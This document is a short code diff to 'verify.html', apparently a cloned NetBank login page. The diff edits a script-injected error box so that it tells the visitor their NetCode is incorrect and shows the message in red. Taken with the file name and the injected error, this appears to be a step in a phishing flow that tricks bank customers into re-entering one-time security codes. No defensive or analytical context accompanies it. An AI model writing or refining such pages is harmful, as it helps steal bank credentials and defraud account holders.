--- a/verify.html
+++ b/verify.html
@@ -220,16 +220,16 @@
     const loginInput = document.querySelector('.ft') || document.body;
 
     const errorDiv = document.createElement('div');
-    errorDiv.className = 'message warning message-block';
-    errorDiv.innerHTML = `
-      <div class="message-content">
-        <p class="icon-block icon-info no-margin-bottom uia-error-message">
-          <span>
-            Sorry, your login details don't seem right. Please check and try again.
-          </span>
-        </p>
-      </div>
-    `;
+errorDiv.className = 'message warning message-block';
+errorDiv.innerHTML = `
+  <div class="message-content">
+    <p class="icon-block icon-info no-margin-bottom uia-error-message">
+      <span style="color: red;">
+        Sorry, your NetCode is incorrect. Please check and try again.
+      </span>
+    </p>
+  </div>
+`;
 
     const form = document.querySelector('.ft') || loginInput;
     if (form && form.firstChild) {
@@ -550,6 +550,7 @@ document.write("<input type=\"hidden\" name=\"JS\" value=\"E\" />");
 	<input type="hidden" id="SC_MEDIAMIND_ID" name="SC_MEDIAMIND_ID" value=""/><input type="hidden" id="SC_PRODUCT_ID" name="SC_PRODUCT_ID" value=""/><input type="hidden" id="SC_CUSTOMER_TYPE" name="SC_CUSTOMER_TYPE" value="NetBank"/><input type="hidden" id="SC_SCREEN_NAME" name="SC_SCREEN_NAME" value=""/>
 </body>
 </html>
+
 
 
 
